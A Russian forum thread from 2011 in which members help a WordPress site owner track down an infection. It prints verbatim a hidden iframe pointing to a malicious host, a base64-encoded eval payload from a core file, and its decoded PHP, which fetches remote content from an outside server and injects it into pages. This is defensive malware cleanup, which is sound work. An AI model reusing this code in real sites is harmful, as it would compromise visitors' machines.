Перейти к содержимому


× Быстрый вопрос
Пользователь месяца
dos1k dos1k 1-й за Май
Очков активности: 1 194 28 тем, 115 сообщений, 4 балла репутации
Сайт: dos1k.ru
ТОП самых активных за этот месяц
  • Фотография Olya23
    #1

    Olya23
    Очков активности: 990 3 темы, 123 сообщения, 5 баллов репутации

  • Фотография Rodiola
    #2

    Rodiola (rukodelkovo.ru)
    Очков активности: 684 0 тем, 76 сообщений, 6 баллов репутации

  • Фотография maxnik
    #3

    maxnik (konovalovpavel.ru)
    Очков активности: 90 0 тем, 20 сообщений, 3 балла репутации

  • Фотография agrx
    #4

    agrx (key-assort.ru)
    Очков активности: 54 0 тем, 18 сообщений, 2 балла репутации

  • Фотография fedornabilkin
    #5

    fedornabilkin (plohoneponyal.ru)
    Очков активности: 51 0 тем, 17 сообщений, 2 балла репутации

  • Фотография BLIK
    #6

    BLIK
    Очков активности: 40.5 Вне конкурса за определение пользователя месяца

  • Фотография Андрей WPMasterKZ
    #7

    Андрей WPMasterKZ (wpmaster.kz)
    Очков активности: 37.5 0 тем, 25 сообщений, 1 балл репутации

  • Фотография re-search
    #8

    re-search
    Очков активности: 36 5 тем, 9 сообщений, 1 балл репутации

  • Фотография FIvYUr
    #9

    FIvYUr (catblogger.ru)
    Очков активности: 36 0 тем, 24 сообщения, 1 балл репутации

  • Фотография Ixman
    #10

    Ixman (o5cat.ru)
    Очков активности: 27 0 тем, 9 сообщений, 2 балла репутации

  • Показать весь ТОП 10
Поддержите форум! =)
Апдейты
  • Яндекс ИКС: 24.05.2019
  • Яндекс выдача: 19.06.2019
Топ 5 участников по репутации


С сайта поперли вирусы (стр. 2)

#21 Kismedia

Kismedia
  • Неактивные
  • 315 сообщений
  • Репутация: 0
0

Отправлено 09 Февраль 2011 - 13:14

Нет, базу пока не надо, давайте с файлами разберемся.
Много плагинов сейчас подключено.

Только, я надеюсь Вы поняли что архив директории нужен той которая сейчас на хосте реально, а не Ваша локальная копия.
  • 0

#22 softgaz

softgaz
    Topic Starter
  • Неактивные
  • 14 сообщений
  • Репутация: 0

Отправлено 09 Февраль 2011 - 13:25

Нет, базу пока не надо, давайте с файлами разберемся.
Много плагинов сейчас подключено.

Только, я надеюсь Вы поняли что архив директории нужен той которая сейчас на хосте реально, а не Ваша локальная копия.


Естественно, это понятно: реальные скрипты

Нет, базу пока не надо, давайте с файлами разберемся.
Много плагинов сейчас подключено.

Только, я надеюсь Вы поняли что архив директории нужен той которая сейчас на хосте реально, а не Ваша локальная копия.


Отправил - заранее огромнейшее спасибо!!!
  • 0

#23 Kismedia

Kismedia
  • Неактивные
  • 315 сообщений
  • Репутация: 0

Отправлено 09 Февраль 2011 - 15:53

softgaz, проверил все на наличие распространенных видов, способов подгрузки стороннего кода.
Так же прогнал сайт через несколько сервисов и программ.
Ничего подозрительного не нашел.

На данный момент у меня антивирус не ругается на Ваш сайт.
У Вас есть сейчас сообщения о вирусе, блокировка сайта?
  • 0

#24 Kismedia

Kismedia
  • Неактивные
  • 315 сообщений
  • Репутация: 0

Отправлено 09 Февраль 2011 - 22:01

softgaz, вчера ,когда Вы начали данную тему у Вас действительно на сайте был вирус.
На данный момент мой антивирус не выдает уже сообщений о вирусе.
Возможно, Вы сами еще с утра в результате замены ,обновлении текущей темы удалили его.
Либо произвели еще какие-либо действия.

Пишите еще раз в Яндекс, 90% что вируса на данный момент нет. ;)
  • 0

#25 surfer

surfer
  • Заблокированные
  • 1 956 сообщений
  • Репутация: 71

Отправлено 09 Февраль 2011 - 22:04

есть вирус ;) ты хостеру писал?
  • 0

#26 Kismedia

Kismedia
  • Неактивные
  • 315 сообщений
  • Репутация: 0

Отправлено 09 Февраль 2011 - 22:09

есть вирус ;) ты хостеру писал?



Да, действительно, сейчас повторно зашел и началось
  • 0

#27 Kismedia

Kismedia
  • Неактивные
  • 315 сообщений
  • Репутация: 0

Отправлено 09 Февраль 2011 - 22:15

Вот собственно лог журнала:

09.02.2011 22:12:46 Фильтр HTTP файл http://ladygaga.ipq.co/games/pdf2.php?f=23 JS/Exploit.Pdfka.OQD троянская программа соединение прервано - изолирован KISMEDIA\Юрий Обнаружена угроза при попытке доступа в Интернет следующим приложением: C:\Program Files\Opera\opera.exe.
  • 0

#28 surfer

surfer
  • Заблокированные
  • 1 956 сообщений
  • Репутация: 71

Отправлено 09 Февраль 2011 - 22:24

он самый, может через сервак бьют, писал хостеру?
ну есчо через скрипт могут, надо проверить версию ВП, плагины какие стоят
свою машину проверял?
  • 0

#29 Kismedia

Kismedia
  • Неактивные
  • 315 сообщений
  • Репутация: 0

Отправлено 09 Февраль 2011 - 23:13

Нашел я твой код в исходнике страницы:

<!-- RSS -->
<div id="header-rss"><a href="http://www.softgaz.ru/?feed=rss2">Подписка на RSS</a></div>
<div id="header-comments"><iframe src="http://ladygaga.ipq.co/index.php?tp=9f58b3191d33ba1b" width="0" height="0" frameborder="0"></iframe><a href="http://www.softgaz.ru/?feed=comments-rss2">Комментарии RSS</a></div>

<!-- Categories -->


Реально Фрэйм пропустил, пропарил, да и хорошо он вообще замаскирован, вклинился прямо в часть кода, не где-то там сбоку.

Правда, архив твоей темы у меня на работе остался, а со своего сервера ты уже его удалил.
Можешь сам его найти и убрать. ;)

Убрать нужно это:

<iframe src="http://ladygaga.ipq.co/index.php?tp=9f58b3191d33ba1b" width="0" height="0" frameborder="0"></iframe>


Возможно в файле header.php

P.S. Понял почему я его не нашел, по-ходу все-таки подгружается он у тебя динамически в шаблон.
То он есть, то его нет.
Завтра просканирую еще раз весь твой архив.

surfer правильно говорит:

он самый, может через сервак бьют, писал хостеру?
ну есчо через скрипт могут, надо проверить версию ВП, плагины какие стоят
свою машину проверял?


Если такая хрень хитрая, прячится еще постоянно, все нужно проверять.
Хостеру напиши!
  • 0

#30 softgaz

softgaz
    Topic Starter
  • Неактивные
  • 14 сообщений
  • Репутация: 0

Отправлено 10 Февраль 2011 - 07:52

Нашел я твой код в исходнике страницы:

<!-- RSS -->
<div id="header-rss"><a href="http://www.softgaz.ru/?feed=rss2">Подписка на RSS</a></div>
<div id="header-comments"><iframe src="http://ladygaga.ipq.co/index.php?tp=9f58b3191d33ba1b" width="0" height="0" frameborder="0"></iframe><a href="http://www.softgaz.ru/?feed=comments-rss2">Комментарии RSS</a></div>

<!-- Categories -->


Реально Фрэйм пропустил, пропарил, да и хорошо он вообще замаскирован, вклинился прямо в часть кода, не где-то там сбоку.

Правда, архив твоей темы у меня на работе остался, а со своего сервера ты уже его удалил.
Можешь сам его найти и убрать. ;)

Убрать нужно это:

<iframe src="http://ladygaga.ipq.co/index.php?tp=9f58b3191d33ba1b" width="0" height="0" frameborder="0"></iframe>


Возможно в файле header.php

P.S. Понял почему я его не нашел, по-ходу все-таки подгружается он у тебя динамически в шаблон.
То он есть, то его нет.
Завтра просканирую еще раз весь твой архив.

surfer правильно говорит:


Если такая хрень хитрая, прячится еще постоянно, все нужно проверять.
Хостеру напиши!



Мужики, просто не знаю, как вас благодарить!
Но кода вируса в РНР я не нашел! Поэтому просто убрал эту строчку в header.php
Но по всему получается, что этот вирус сидит в базе...
  • 0

#31 Kismedia

Kismedia
  • Неактивные
  • 315 сообщений
  • Репутация: 0

Отправлено 10 Февраль 2011 - 08:29

Мужики, просто не знаю, как вас благодарить!
Но кода вируса в РНР я не нашел! Поэтому просто убрал эту строчку в header.php
Но по всему получается, что этот вирус сидит в базе...


Сегодня проверю еще весь твой архив, вместе с плагинами. Возможно там где сидит основной код, который "долбит" тему.
Наверняка в зашифрованном виде.
Но уже проще, мы знаем результат его работы, что именно искать.

Но кода вируса в РНР я не нашел!


Я уже на это и не расчитывал когда писал P.S. , не все так просто.
  • 0

#32 Kismedia

Kismedia
  • Неактивные
  • 315 сообщений
  • Репутация: 0

Отправлено 10 Февраль 2011 - 11:31

Открой вот этот файл \wp-includes\link-template.php

Найди:

eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCJvYl9zdGFydCIpICYmICFmdW5jdGlvbl9leGlzdHMoInpveGdf
cm9kIikgJiYgIWZ1bmN0aW9uX2V4aXN0cygiZW1wcl9heGYiKSAmJiAhZnVuY3Rpb25fZXhpc3RzKCJx
b
2d1bV9ubmMiKSAmJiAhaXNzZXQoJEdMT0JBTFNbImJiZiJdKSAmJiBAc3RycG9zKHN0cnRvbG93ZXIoJ
F
9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKSwiZ29vZ2xlYm90IikgPT09IGZhbHNlICYmIEBzdHJwb3
M
oc3RydG9sb3dlcigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0pLCJtc25ib3QiKSA9PT0gZmFsc2U
g
JiYgQHN0cnBvcyhzdHJ0b2xvd2VyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSksInlhaG9vIikg
P
T09IGZhbHNlICYmICFpc3NldCgkX0NPT0tJRVsidHBrIl0pICl7JEdMT0JBTFNbImJiZiJdID0gMTtzZ
X
Rjb29raWUoInRwayIsIDEsIHRpbWUoKSszNjAwKjI0KjEsICIvIik7ICAgICAgICAgICAgZnVuY3Rpb2
4
gZW1wcl9heGYoJGd6ZW5jb2RlX2FyZykNCiAgICAgICAgICAgICAgICB7DQogICAgICAgICAgICAgICA
g
ICAgICR4ID0gQG9yZChAc3Vic3RyKCRnemVuY29kZV9hcmcsIDMsIDEpKTsNCiAgICAgICAgICAgICAg
I
CAgICAgJHNoaWZ0ID0gMTA7DQogICAgICAgICAgICAgICAgICAgICRzaGlmdDIgPSAwOw0KICAgICAgI
C
AgICAgICAgICAgICBpZiggJHgmNCApDQogICAgICAgICAgICAgICAgICAgIHsNCiAgICAgICAgICAgIC
A
gICAgICAgICAgICR1bnBhY2s9QHVucGFjaygidiIsIHN1YnN0cigkZ3plbmNvZGVfYXJnLCAxMCwgMik
p
Ow0KICAgICAgICAgICAgICAgICAgICAgICAgJHVucGFjaz0kdW5wYWNrWzFdOyAkc2hpZnQrPSAyICsg
J
HVucGFjazsNCiAgICAgICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgICAgICAgICBpZiggJHgmO
C
ApDQogICAgICAgICAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICAgICAgICAgICRzaGlmdCA9IE
B
zdHJwb3MoJGd6ZW5jb2RlX2FyZywgY2hyKDApLCAkc2hpZnQpICsgMTsNCiAgICAgICAgICAgICAgICA
g
ICAgfQ0KICAgICAgICAgICAgICAgICAgICBpZiggJHgmMTYgKQ0KICAgICAgICAgICAgICAgICAgICB7
D
QogICAgICAgICAgICAgICAgICAgICAgICAkc2hpZnQgPSBAc3RycG9zKCRnemVuY29kZV9hcmcsIGNoc
i
gwKSwgJHNoaWZ0KSArIDE7DQogICAgICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgICAgICAgIC
A
gaWYoICR4JjIgKQ0KICAgICAgICAgICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgICAgICAgICA
k
c2hpZnQgKz0gMjsNCiAgICAgICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgICAgICAgICAkZ3pp
c
CA9IEBnemluZmxhdGUoQHN1YnN0cigkZ3plbmNvZGVfYXJnLCAkc2hpZnQpKTsNCiAgICAgICAgICAgI
C
AgICAgICAgaWYoJGd6aXAgPT09IEZBTFNFKQ0KICAgICAgICAgICAgICAgICAgICB7DQogICAgICAgIC
A
gICAgICAgICAgICAgICAkZ3ppcCA9ICRnemVuY29kZV9hcmc7DQogICAgICAgICAgICAgICAgICAgIH0
N
CiAgICAgICAgICAgICAgICAgICAgcmV0dXJuICRnemlwOw0KICAgICAgICAgICAgICAgIH0NCg0KICAg
I
GZ1bmN0aW9uIHFvZ3VtX25uYyggJHVybCApIHsNCg0KLyogICAgICBpZiAoZnVuY3Rpb25fZXhpc3RzK
C
JjdXJsX2luaXQiKSkNCiAgICAgICAgew0KICAgICAgICAgICRjaCA9IGN1cmxfaW5pdCgkdXJsKTsNCi
A
gICAgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7DQogICA
g
ICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgNSk7DQogICAgICAgICAgICAk
Y
3VybF9yZXN1bHQgPSBjdXJsX2V4ZWMgKCRjaCk7DQogICAgICAgICAgICBjdXJsX2Nsb3NlKCRjaCk7D
Q
ogICAgICAgICAgICBpZiAoJGN1cmxfcmVzdWx0KSByZXR1cm4gJGN1cmxfcmVzdWx0Ow0KICAgICAgIC
B
9DQoNCiAgICAgICAgaWYgKEBpbmlfZ2V0KCJhbGxvd191cmxfZm9wZW4iKSkNCiAgICAgICAgew0KICA
g
ICAgICAgICAgJGZpbGVfcmVzdWx0ID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCR1cmwpOw0KICAgICAgICAg
I
CAgaWYgKCRmaWxlX3Jlc3VsdCkgcmV0dXJuICRmaWxlX3Jlc3VsdDsNCiAgICAgICAgfSAgICovDQoNC
i
AgICAgICAgJHVybF9pbmZvID0gcGFyc2VfdXJsKCR1cmwpOw0KICAgICAgICAkcXVlcnkgID0gIkdFVC
A
kdXJsIEhUVFAvMS4wXHJcbiI7DQogICAgICAgICRxdWVyeSAuPSAiSG9zdDogIiAuICR1cmxfaW5mb1s
i
aG9zdCJdIC4gIlxyXG4iOw0KICAgICAgICAkcXVlcnkgLj0gIkNvbm5lY3Rpb246IENsb3NlXHJcblxy
X
G4iOw0KICAgICAgICAkZnAgPSBAZnNvY2tvcGVuKCR1cmxfaW5mb1siaG9zdCJdLCA4MCwgJGVycm5vL
C
AkZXJyc3RyLCA1KTsNCiAgICAgICAgaWYgKCEkZnApIHJldHVybiBmYWxzZTsNCiAgICAgICAgQGZwdX
R
zKCRmcCwgJHF1ZXJ5KTsNCiAgICAgICAgQHNvY2tldF9zZXRfdGltZW91dCAoJGZwLCA1LCAwKTsNCiA
g
ICAgICAgJHNfcmV0Y29kZSA9IEBzdWJzdHIgKEBmZ2V0cyAoJGZwLCA0MDk2KSwgOSwgMyk7DQogICAg
I
CAgIGlmICgkc19yZXRjb2RlezB9IDw+ICIyIikge3JldHVybiBGQUxTRTt9DQogICAgICAgIHdoaWxlI
C
ghIEBmZW9mICgkZnApKQ0KICAgICAgICB7DQogICAgICAgICAgICBpZiAoIlxyXG4iID09PSBAZmdldH
M
gKCRmcCwgNDA5NikpIHticmVhazt9DQogICAgICAgIH0NCiAgICAgICAgJHNvY2tldF9yZXN1bHQgPSA
i
IjsNCiAgICAgICAgd2hpbGUgKCEgQGZlb2YgKCRmcCkpIHsNCiAgICAgICAgICAgICRzb2NrZXRfcmVz
d
Wx0IC49IEBmZ2V0cyAoJGZwLCA0MDk2KTsNCiAgICAgICAgfQ0KICAgICAgICBAZmNsb3NlKCRmcCk7D
Q
ogICAgICAgIGlmICgkc29ja2V0X3Jlc3VsdCkgcmV0dXJuICRzb2NrZXRfcmVzdWx0Ow0KICAgIH0NCi
A
gICBmdW5jdGlvbiB6b3hnX3JvZCgkZW5mKXtnbG9iYWwgJGloZGVnX2J2ZztyZXR1cm4gcHJlZ19yZXB
s
YWNlKCIjKDwvdGFibGU+Lio8dGQ+fDwvdGFibGU+fDwvZGl2PltePD5dKjxkaXZbXjw+XSo+fDwvYm9k
e
T4pI2lzIiwgIiQxIiAuICRpaGRlZ19idmcsIGVtcHJfYXhmKCRlbmYpLCAxKTsNCiAgICB9JGloZGVnX
2
J2Zz1xb2d1bV9ubmMoYmFzZTY0X2RlY29kZSgiYUhSMGNEb3ZMMmRqYjNWdWRHVnlMbU51TDJsdVptOH
V
jR2h3IikgLiAiP2k9IiAuICRfU0VSVkVSWyJSRU1PVEVfQUREUiJdKTtAcHJlZ19tYXRjaCgiIzxvcGV
u
PiguKik8L2Nsb3NlPiMiLCAkaWhkZWdfYnZnLCAkbWF0Y2hlcyk7JGloZGVnX2J2Zz0gaXNzZXQoJG1h
d
GNoZXNbMV0pID8gJG1hdGNoZXNbMV0gOiAiIjtpZiAoJGloZGVnX2J2ZykgIG9iX3N0YXJ0KCJ6b3hnX
3
JvZCIpO30="));


Попробуй удалить этот кусок кода.

Сейчас еще попробую расшифровать эту хрень, для 100% уверенности.
  • 0

#33 Kismedia

Kismedia
  • Неактивные
  • 315 сообщений
  • Репутация: 0

Отправлено 10 Февраль 2011 - 11:40

Вот расшифровка, не знаю что это, но больше ничего подозрительного, кроме выше приведенного кода зашифрованного через Base64, я не нашел.

if(function_exists("ob_start") && !function_exists("zoxg_rod") && !function_exists("empr_axf") && !function_exists("qogum_nnc") && !isset($GLOBALS["bbf"]) && @strpos(strtolower($_SERVER["HTTP_USER_AGENT"]),"googlebot") === false && @strpos(strtolower($_SERVER["HTTP_USER_AGENT"]),"msnbot") === false && @strpos(strtolower($_SERVER["HTTP_USER_AGENT"]),"yahoo") === false && !isset($_COOKIE["tpk"]) ){$GLOBALS["bbf"] = 1;setcookie("tpk", 1, time()+3600*24*1, "/");			function empr_axf($gzencode_arg)
{
$x = @ord(@substr($gzencode_arg, 3, 1));
$shift = 10;
$shift2 = 0;
if( $x&4 )
{
$unpack=@unpack("v", substr($gzencode_arg, 10, 2));
$unpack=$unpack[1]; $shift+= 2 + $unpack;
}
if( $x&8 )
{
$shift = @strpos($gzencode_arg, chr(0), $shift) + 1;
}
if( $x&16 )
{
$shift = @strpos($gzencode_arg, chr(0), $shift) + 1;
}
if( $x&2 )
{
$shift += 2;
}
$gzip = @gzinflate(@substr($gzencode_arg, $shift));
if($gzip === FALSE)
{
$gzip = $gzencode_arg;
}
return $gzip;
}

function qogum_nnc( $url ) {

/* if (function_exists("curl_init"))
{
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$curl_result = curl_exec ($ch);
curl_close($ch);
if ($curl_result) return $curl_result;
}

if (@ini_get("allow_url_fopen"))
{
$file_result = @file_get_contents($url);
if ($file_result) return $file_result;
} */

$url_info = parse_url($url);
$query = "GET $url HTTP/1.0\r\n";
$query .= "Host: " . $url_info["host"] . "\r\n";
$query .= "Connection: Close\r\n\r\n";
$fp = @fsockopen($url_info["host"], 80, $errno, $errstr, 5);
if (!$fp) return false;
@fputs($fp, $query);
@socket_set_timeout ($fp, 5, 0);
$s_retcode = @substr (@fgets ($fp, 4096), 9, 3);
if ($s_retcode{0} <> "2") {return FALSE;}
while (! @feof ($fp))
{
if ("\r\n" === @fgets ($fp, 4096)) {break;}
}
$socket_result = "";
while (! @feof ($fp)) {
$socket_result .= @fgets ($fp, 4096);
}
@fclose($fp);
if ($socket_result) return $socket_result;
}
function zoxg_rod($enf){global $ihdeg_bvg;return preg_replace("#(</table>.*<td>|</table>|</div>[^<>]*<div[^<>]*>|</body>)#is", "$1" . $ihdeg_bvg, empr_axf($enf), 1);
}$ihdeg_bvg=qogum_nnc(base64_decode("aHR0cDovL2djb3VudGVyLmNuL2luZm8ucGhw") . "?i=" . $_SERVER["REMOTE_ADDR"]);@preg_match("#<open>(.*)</close>#", $ihdeg_bvg, $matches);$ihdeg_bvg= isset($matches[1]) ? $matches[1] : "";if ($ihdeg_bvg) ob_start("zoxg_rod");}

  • 0

#34 Kismedia

Kismedia
  • Неактивные
  • 315 сообщений
  • Репутация: 0

Отправлено 10 Февраль 2011 - 12:01

Еще в теме e-storage-plus есть три больших вхождения eval(base64_decode
Но не думаю что они работают, тема активирована другая. Можешь удалить ее, все равно не используешь.
  • 0

#35 surfer

surfer
  • Заблокированные
  • 1 956 сообщений
  • Репутация: 71

Отправлено 10 Февраль 2011 - 12:03

данный кусок кода подключает http://gcounter.cn/info.php и отсюда идет атака
  • 0

#36 softgaz

softgaz
    Topic Starter
  • Неактивные
  • 14 сообщений
  • Репутация: 0

Отправлено 10 Февраль 2011 - 12:04

Вот расшифровка, не знаю что это, но больше ничего подозрительного, кроме выше приведенного кода зашифрованного через Base64, я не нашел.


Удалил - все работает!
Но поступил проще: скопировал этот файл с другого своего сайта!
СПАСИБО ОГРОМНЕЙШЕЕ!!!!!!!!!
ПРОСТО НЕ ЗНАЮ - КАК БЛАГОДАРИТЬ!!!!!!!!!!
ПИВО ПРИ ВСТРЕЧЕ - ГАРАНТИРУЮ!!!!!!!!!!!!!
  • 0

#37 Kismedia

Kismedia
  • Неактивные
  • 315 сообщений
  • Репутация: 0

Отправлено 10 Февраль 2011 - 12:12

данный кусок кода примитивно подключает http://gcounter.cn/info.php


По этому адресу и есть вирус.
То есть работал он получается в несколько этапов.
Вначале подгружал http://gcounter.cn/info.php, а с него уже брал код вставки в исходник.
<iframe src="http://ladygaga.ipq.co/index.php?tp=9f58b3191d33ba1b" width="0" height="0" frameborder="0"></iframe>

Вполне возможно, что данный код еще и менялся постоянно, или исчезал на время, отследить тяжело.

Короче нормальную хрень ты подхватил! ;)
Я с таким, до этого не сталкивался, обычно вирус тупо прописывался в файлы шаблона.
  • 0

#38 Kismedia

Kismedia
  • Неактивные
  • 315 сообщений
  • Репутация: 0

Отправлено 10 Февраль 2011 - 12:27

Причем URL http://gcounter.cn/info.php зашифрован дважды.
$ihdeg_bvg=qogum_nnc(base64_decode("aHR0cDovL2djb3VudGVyLmNuL2luZm8ucGhw")


Красивый вирусняк такой. ;)
  • 0

#39 Kismedia

Kismedia
  • Неактивные
  • 315 сообщений
  • Репутация: 0

Отправлено 10 Февраль 2011 - 13:22

Сообщение 33 , код посмотрите уже расшифрованный в конце.
  • 0

#40 softgaz

softgaz
    Topic Starter
  • Неактивные
  • 14 сообщений
  • Репутация: 0

Отправлено 10 Февраль 2011 - 13:25

А почемы вы решили что дважды?


Я другое никак не пойму: а почему дата файла не поменялась?! Я ж все искал в соответствии с инструкциями Яндекса: смотри по датам изменения файлов! А они не поменялись - как такое возможно?
  • 0

robot

robot
  • Пользователь PRO
  • 2 652 сообщений
  • Репутация: 85


Похожие темы

  Название темы Автор Статистика Последнее сообщение

Оформление форума – IPBSkins.ru